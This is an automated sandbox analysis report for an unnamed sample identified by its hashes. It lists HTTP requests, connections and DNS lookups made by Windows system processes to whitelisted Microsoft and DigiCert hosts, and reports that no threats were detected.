MD5: 945879C7A7991CA0A446BCB1EC0A6B58
SHA256: 53BAA36F81B355B6A619EFCA169BF4B13802024AF6442AE49D974B78E8CFFECD
HTTP(S) requests: 6
TCP/UDP connections: 23
DNS requests: 14
Threats: 0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
7516
BackgroundTransferHost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
6544
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
7828
backgroundTaskHost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
23.48.23.166:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
7668
SIHClient.exe
GET
200
23.209.214.100:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7668
SIHClient.exe
GET
200
23.209.214.100:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5496
MoUsoCoreWorker.exe
23.48.23.166:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4164
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2104
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3216
svchost.exe
40.113.110.67:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
20.190.160.130:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
7828
backgroundTaskHost.exe
20.223.35.26:443
arc.msn.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
7828
backgroundTaskHost.exe
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 23.48.23.166
  • 23.48.23.169
  • 23.48.23.180
  • 23.48.23.173
  • 23.48.23.156
  • 23.48.23.143
  • 23.48.23.177
  • 23.48.23.193
whitelisted
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
client.wns.windows.com
  • 40.113.110.67
whitelisted
login.live.com
  • 20.190.160.130
  • 20.190.160.5
  • 40.126.32.74
  • 40.126.32.134
  • 20.190.160.4
  • 40.126.32.72
  • 40.126.32.140
  • 20.190.160.20
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
arc.msn.com
  • 20.223.35.26
whitelisted
www.bing.com
  • 2.19.122.49
  • 2.19.122.46
  • 2.19.122.56
  • 2.19.122.51
  • 2.19.122.58
  • 2.19.122.55
  • 2.19.122.48
  • 2.19.122.47
  • 2.19.122.54
whitelisted
slscr.update.microsoft.com
  • 4.245.163.56
whitelisted
www.microsoft.com
  • 23.209.214.100
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.3.187.198
whitelisted

Threats

No threats detected
No debug info